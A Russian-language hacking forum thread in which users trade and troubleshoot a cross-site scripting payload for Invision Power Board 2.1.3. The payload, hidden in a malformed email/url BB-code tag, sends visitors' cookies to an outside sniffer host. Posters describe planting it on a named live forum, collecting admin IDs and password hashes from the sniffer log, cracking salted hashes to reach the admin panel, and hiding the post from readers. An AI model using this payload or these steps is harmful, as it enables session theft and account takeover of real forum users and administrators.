Не подскажите какие уязвимости присутствуют в Invision Power Board (Free Trial) v2.1.3 © 2005 а то ни где не нашёл!

wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Ploho ishesh

Спасибо попробую

А как от этого защитится ?

ребята, вставляю хеш и ид админа в куки (речь идет о ипб 2.1.3) но всё ровно не могу зайти под админом, хотя в ипб 1.3 всё отлично работает. в чём дело не подскажете?

Потому что в 2.х в админке еще раз проверяеться пасс...
тебе надо пасс админа а не кго куки.
а так как это 2.х ты не разшифруеш мд5 без соли...
разшифровывай и заходи в админку

А как от этого защитится ?
Вроде выключить bb код

wj@wj[/url].com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Ploho ishesh

narod objasnite plizz soderjimoe etogo koda
wj@wj - leviy email
[url]http://www.wj.com (http://www.wj.com`=`) - leviy url a za4em tam `=`?
nu dalwe vrode vse ponatno...
pasipa

` - это символ обратного апострофа, он является ограничителем атрибутов, но только в IE.

Эти адреса не важны вообще: можешь поставить вместо их что-угодно.

но всё ровно не могу зайти под админом,
там в админке можно включать привязку сессии к ипу и браузеру. по умолчанию привязка только к ипу, насколько я помню.

narod objasnite plizz soderjimoe etogo koda
wj@wj - leviy email
http://www.wj.com - leviy url a za4em tam `=`?
nu dalwe vrode vse ponatno...
pasipa
Вот например мне нужно поместить этот код на форум:
http://forum.la2world.ru/index.php?showtopic=3208&st=40

Что должно быть написано в коде?

Замест wj@wj, мой е-майл, а замест етого:
http://www.wj.com`=`].com
что должно быть?

Эээ...да тебе вообще ничего не надо заменять :))))) тебе просто код Джордана надо фтыкнуть и все ;) а далее смотри на логе сниффера, который указал, в коде Джордана это - http://antichat.ru/sniff/log.php и ищи свои данные (только сначала удостоверься, пашет ли вообще код :))

Здесь еще одна проблема...
Когда ставлю етот код, то в IE все норм, тоесть в сообщении ничего не отображается, НО в Opera отображается такое:
.com'>wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Можно ли ето как-нить убрать?

З.Ы. Код нормально пашет ))

тока в осле работает!

З.Ы. Код нормально пашет ))
Если бы он работал, тогда бы это не писалось, значит маскируй цветом или размерами....

ОК, попробую, но код пашет, т.к. в ИЕ не отображается и на снифер пришло уже 3 ИД с хешами....
Еще вопрос... Можно-ли как-то добавить в пост с кодом, что-бы пост был не пустой, а там что-то отображалось? Я пробовал записять в начало, не получилось....

Ну дак просто вставляешь скрипт, например:
[script] а потом текст!
и все - идет типо скрипт и текст, скрипт не видно а текст видно, мол ты просто запостил и все ;)

=) Щас попробуем...

М-да, через СКРИПТ не работает, просто выводит сам КОД =((

А если поставить КОД, как подпись... Он будет работать ?

должен

Kak ni stranno, no v podpisi ne kod ne rabotaet. X3 pochemu.

хмм, как я думаю, возможно фильтр админ поставил, нужнго смотреть, и пробвать методом тыка :)